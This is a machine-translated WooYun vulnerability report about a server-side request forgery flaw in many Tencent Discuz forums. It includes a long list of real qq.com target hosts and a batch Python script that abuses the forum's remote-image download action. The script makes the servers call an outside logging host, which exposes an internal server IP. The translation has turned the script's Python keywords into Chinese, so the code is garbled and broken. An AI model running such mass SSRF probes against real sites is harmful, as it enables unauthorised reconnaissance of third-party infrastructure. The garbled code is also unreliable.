漏洞标题 腾讯论坛中有一个SSRF漏洞(有批量泄漏脚本) 相关制造商 腾讯 漏洞作者 猪人 提交时间 2016-06-12 11: 25 公共时间 2016-06-13 17: 23 漏洞类型 未经授权的访问/许可绕过 危险等级 在 自我评估等级 10 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 漏洞详细信息 #1首先找出腾讯从搜索引擎和抓取工具中使用Discuz程序的服务器列表。 http://fight.gamebbs.qq.com http://qqhx.gamebbs.qq.com http://bbs.digi.qq.com http://bbs.write.qq.com http://ff.gamebbs.qq.com http://bbs.baby.qq.com http://myhn.qq.com http://bbs.e.qq.com http://tpai.qq.com http://bbs.fanli.qq.com http://bbs.house.qq.com http://xia.gamebbs.qq.com http://bbs.cb.qq.com http://bbs.ac.qq.com http://club.auto.qq.com http://bbs.open.qq.com http://shouyou.qq.com http://bbs.im.qq.com http://qqbattle.gamebbs.qq.com http://nz.gamebbs.qq.com http://xx.gamebbs.qq.com http://xb.gamebbs.qq.com http://bbs.m.qq.com http://forum.discuz.qq.com http://bbs.cd.qq.com http://myln.qq.com http://ktv.gamebbs.qq.com http://gf.gamebbs.qq.com http://bbs.xian.qq.com http://gamebbs.qq.com http://ppjz.gamebbs.qq.com http://dm.gamebbs.qq.com http://ffo.gamebbs.qq.com http://sg.gamebbs.qq.com http://xb.qq.com http://bbs.zt.qq.com http://mygd.qq.com http://xj.gamebbs.qq.com http://xb.qq.com: 8080 http://bbs.gj.qq.com http://bbs.vip.qq.com http://bbs.sports.qq.com http://bbs.weiqi.qq.com http://lol.gamebbs.qq.com http://bbs.finance.qq.com http://d2.gamebbs.qq.com http://fs.gamebbs.qq.com http://myfj.qq.com http://mysh.qq.com http://ch.gamebbs.qq.com http://qqxy.gamebbs.qq.com http://codol.gamebbs.qq.com http://ava.gamebbs.qq.com http://fo.gamebbs.qq.com http://bbs.lol.qq.com http://wang.gamebbs.qq.com http://bbs.games.qq.com http://bbs.omd.qq.com http://tps.gamebbs.qq.com http://tiantang2.gamebbs.qq.com http://qqgame.gamebbs.qq.com http://bbs.yun.qq.com http://yl.gamebbs.qq.com http://bbs.wifi.qq.com http://bns.gamebbs.qq.com http://nba2k.gamebbs.qq.com http://bbs.blog.qq.com http://r2.gamebbs.qq.com http://bbs.open.t.qq.com http://ld2.gamebbs.qq.com http://yu.gamebbs.qq.com http://qgamepailei.gamebbs.qq.com http://hao.wsq.qq.com http://c9.gamebbs.qq.com 从对等方接收数据时失败 http://xxz.gamebbs.qq.com http://bbs.pcmgr.qq.com http://myxian.qq.com http://xiaoyuan.qq.com http://mycd.qq.com http://cf.gamebbs.qq.com http://ug.qq.com http://myzj.qq.com http://bbs.meishi.qq.com http://bbs.astro.qq.com http://7.gamebbs.qq.com http://3366.gamebbs.qq.com http://meng.gamebbs.qq.com http://baoshi.gamebbs.qq.com http://bbs.guanjia.qq.com http://mo.gamebbs.qq.com http://bbs.cf.qq.com http://bbs.gd.qq.com http://bbs.comic.qq.com http://vr.qq.com http://mycq.qq.com http://tiantang.gamebbs.qq.com http://bbs.map.qq.com http://cheng.gamebbs.qq.com http://tnt.gamebbs.qq.com http://myhenan.qq.com http://xy.gamebbs.qq.com http://h2.gamebbs.qq.com http://bbs.show.qq.com http://bbs.wan.qq.com http://bbs.ent.qq.com http://qqsh.gamebbs.qq.com http://mama.kid.qq.com http://bbs.cq.qq.com http://bbs.qt.qq.com http://age.gamebbs.qq.com http://bbs.fashion.qq.com http://bbs.v.qq.com http://bbs.mail.qq.com http://bbs.ms.qq.com http://pet.gamebbs.qq.com http://bl.gamebbs.qq.com http://bbs.hb.qq.com http://x.gamebbs.qq.com http://bbs.tgp.qq.com http://hon.gamebbs.qq.com http://jh.gamebbs.qq.com http://zg.gamebbs.qq.com https://xb.qq.com http://9.gamebbs.qq.com http://bbs.shang.qq.com http://ye.gamebbs.qq.com http://bbs.news.qq.com http://bbs.qa.qq.com http://bbs.chuangshi.qq.com http://x5.gamebbs.qq.com #2创建批量检测脚本泄漏 #!/usr/bin/env python #coding: utf-8 导入urlparse 随机导入 进口时间 导入重新 导入请求 从utils.fileutils导入FileUtils 导入requests.packages.urllib3 Requests.packages.urllib3.disable_warnings() 对于FileUtils.getLines('qqdz.lst'):中的网站 Request=requests.session() 试试: Forumurl='{website} /forum.php'.format(website=website) Response=request.get(forumurl,timeout=5,verify=False) Formhash=re.findall(r'formhash'value='(。*?)'',response.content) Netloc=urlparse.urlparse(网站).netloc Payload='http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc) Url='{website} /forum.php?mod=ajax&action=downremoteimg&formhash={formhash}& message=[img] {payload} [/img]'。format( 网站=网站, Formhash=formhash [0]如果formhash else'', 有效载荷=有效载荷) Response=request.get(url,timeout=5,verify=False) 打印网址,len(response.content) 除了例外,e: 打印网站,e 上面的fileutils库就在这里 http://fuzz.wuyun.org/src/fileutils.py 漏洞证明: #3运行批处理,检查fuzz.wuyun.com的httpd上的请求日志 119.29.69.176 - - [12/Jun/2016: 11: 00: 45 +0800]'GET /404.php?s=vr.qq.com.jpg HTTP/1.1'404 282' - '' - ' #4捡到一个泄露的论坛 http://vr.qq.com/forum.php IP: 119.29.69.176 广东省广州腾讯云计算(北京)有限公司腾讯集团 修理计划: #论坛这么多,总有一些失踪案例 版权声明:转载请注明出处猪猪人@乌云